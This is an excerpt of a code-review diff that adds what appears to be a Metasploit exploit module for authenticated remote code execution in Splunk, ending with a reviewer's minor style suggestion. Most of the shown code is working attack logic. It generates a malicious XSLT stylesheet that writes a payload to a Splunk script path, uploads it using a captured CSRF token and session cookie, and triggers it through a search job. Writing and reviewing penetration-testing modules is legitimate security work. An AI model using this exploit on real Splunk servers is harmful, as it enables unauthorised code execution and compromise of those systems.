modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb

```diff
@@ -0,0 +1,413 @@
+      return true
+    end
+    print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}")
+    false
+  end
+
+  def generate_malicious_xsl
+    encoded_payload = Rex::Text.html_encode(payload.encoded)
+
+    xsl_template = <<~XSL
+      <?xml version="1.0" encoding="UTF-8"?>
+      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
+        <xsl:template match="/">
+          <exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text">
+            <xsl:text>#{encoded_payload}</xsl:text>
+          </exsl:document>
+        </xsl:template>
+      </xsl:stylesheet>
+    XSL
+
+    xsl_template
+  end
+
+  def get_job_search_id(csrf_token, cookie_string)
+    return false, nil unless csrf_token
+
+    jsid_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')
+
+    upload_headers = {
+      'X-Requested-With' => 'XMLHttpRequest',
+      'X-Splunk-Form-Key' => csrf_token,
+      'Cookie' => cookie_string
+    }
+
+    jsid_data = {
+      'search' => '|search test|head 1'
+    }
+
+    print_status("Sending job search request to #{jsid_url}")
+    res = send_request_cgi(
+      'uri' => jsid_url,
+      'method' => 'POST',
+      'vars_post' => jsid_data,
+      'headers' => upload_headers,
+      'vars_get' => { 'output_mode' => 'json' }
+    )
+
+    unless res
+      print_error('Failed to initiate job search: No response received')
+      return false, nil
+    end
+
+    jsid = JSON.parse(res.body)['sid']
+    return true, jsid if jsid
+  end
+
+  def upload_malicious_file(file_content, csrf_token, cookie_string)
+    unless csrf_token
+      print_error('CSRF token not found')
+      return false, nil
+    end
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(file_content, 'application/xslt+xml', nil, 'form-data; name="spl-file"; filename="shell.xsl"')
+
+    upload_headers = {
+      'Accept' => 'text/javascript, text/html, application/xml, text/xml, */*',
+      'X-Requested-With' => 'XMLHttpRequest',
+      'X-Splunk-Form-Key' => csrf_token,
+      'Cookie' => cookie_string
+    }
+
+    upload_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__upload', 'indexing', 'preview')
+
+    res = send_request_cgi(
+      'uri' => upload_url,
+      'method' => 'POST',
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'headers' => upload_headers,
+      'vars_get' => {
+        'output_mode' => 'json',
+        'props.NO_BINARY_CHECK' => 1,
+        'input.path' => 'shell.xsl'
+      }
+    )
+
+    unless res
+      print_error('Malicious file upload failed: No response received')
+      return false, nil
+    end
+
+    response_body = res.body
+    if response_body.nil? || response_body.empty?
```

Comment:
Using `#blank?` will combine these two checks.

```suggestion
    if response_body.blank?
```